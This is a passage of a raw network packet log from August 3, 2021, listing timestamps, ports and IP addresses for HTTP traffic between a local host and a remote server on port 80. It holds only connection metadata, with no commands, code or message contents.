Aug 3, 2021 16:50:37.973592043 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973604918 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973613024 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973622084 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973632097 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973639011 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973651886 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973663092 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973671913 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973683119 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973691940 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973697901 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973716021 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973721027 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973738909 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973745108 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973758936 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973766088 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973778963 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973779917 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973798037 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973805904 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973818064 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973825932 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973839045 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973839045 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973859072 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973865986 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973884106 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973886967 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973905087 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973912954 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973925114 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973927975 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973944902 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973952055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973964930 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973972082 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973984957 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973994970 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.974005938 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.974013090 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.974025965 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.974033117 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.974050999 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.974051952 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.974078894 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.976325989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978486061 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978518963 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978548050 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978574991 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978586912 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978600025 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978600025 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978621960 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978626013 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978646040 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978652000 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978663921 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978686094 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978686094 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978715897 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978743076 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978755951 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978769064 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978796005 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978822947 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978822947 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978853941 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978859901 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978885889 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978907108 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978919983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978929996 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.978950024 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978976011 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.978988886 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979002953 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979031086 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979034901 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979058027 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979074955 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979084969 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979111910 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979134083 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979140043 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979166031 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979168892 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979198933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979207993 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979228973 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979231119 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979255915 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979279041 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979280949 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979305029 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979307890 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979330063 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979332924 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979343891 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979360104 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979381084 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979384899 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979397058 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979417086 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979418039 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979448080 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979458094 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979474068 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979475021 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979500055 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979511023 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979526997 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979528904 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979552031 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979558945 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979578972 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979588032 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979604959 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979613066 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979631901 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979638100 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979666948 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979675055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979691982 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979692936 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979718924 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979729891 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979746103 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979765892 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979769945 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979779005 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979795933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979799032 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979823112 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.979830980 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.979857922 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980077982 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980107069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980134964 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980169058 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980221987 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980278015 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980283022 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980307102 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980321884 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980341911 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980353117 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980371952 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980381966 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980422974 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980427027 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980462074 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980463028 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980500937 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980500937 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980528116 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980537891 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980561018 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980565071 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980591059 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980607986 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980618000 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980626106 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980643988 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980669975 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980670929 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980688095 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980695009 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980709076 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980720997 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980746031 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980748892 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980771065 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980778933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980789900 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980808020 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980819941 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980834007 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980842113 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980859995 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980886936 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.980895996 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.980941057 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981389046 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981431007 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981457949 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981467962 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981486082 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981487989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981518984 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981544018 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981590986 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981621981 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981669903 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981673956 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981705904 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981738091 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981777906 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981784105 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981812954 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981826067 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981852055 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981853962 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981889963 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981899977 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981928110 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981930017 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981964111 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.981971025 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.981997013 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.982006073 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.982024908 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.982036114 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.982053041 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.982064009 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.982083082 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.982825994 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.982927084 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.982969999 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.982973099 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.982999086 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.983026028 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.983026028 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.983052969 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.983057022 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.983074903 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.983079910 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.983102083 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.983125925 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.983591080 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.983639002 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.983669996 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.983717918 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.983741999 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.983778000 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.983793974 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.983819962 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985379934 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985444069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985477924 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985481977 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985501051 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985518932 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985522985 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985558987 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985560894 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985598087 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985598087 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985631943 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985646963 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985656977 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985671043 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985688925 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985697985 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985717058 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985717058 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985742092 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985754013 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985769033 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985775948 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985794067 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985795975 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985819101 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985821962 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985843897 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985852957 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985868931 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.985873938 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985902071 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.985981941 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986023903 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986026049 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986063957 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986067057 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986107111 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986108065 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986144066 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986146927 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986181974 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986185074 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986218929 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986227036 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986255884 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986257076 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986291885 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986301899 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986330986 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986332893 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986371040 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986376047 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986407042 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986412048 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986443996 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986443996 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986489058 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986489058 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986525059 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986529112 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986565113 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986571074 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986610889 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986613035 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986660957 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986663103 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986702919 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986705065 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986747026 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986752987 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986783981 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986784935 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986821890 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986826897 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986869097 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986877918 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986896992 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.986905098 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.986944914 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989264965 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989303112 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989321947 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989353895 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989382029 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989408016 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989437103 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989442110 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989463091 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989471912 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989502907 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989510059 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989526033 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989547014 CEST	80	49167	13.229.216.142	192.168.2.22
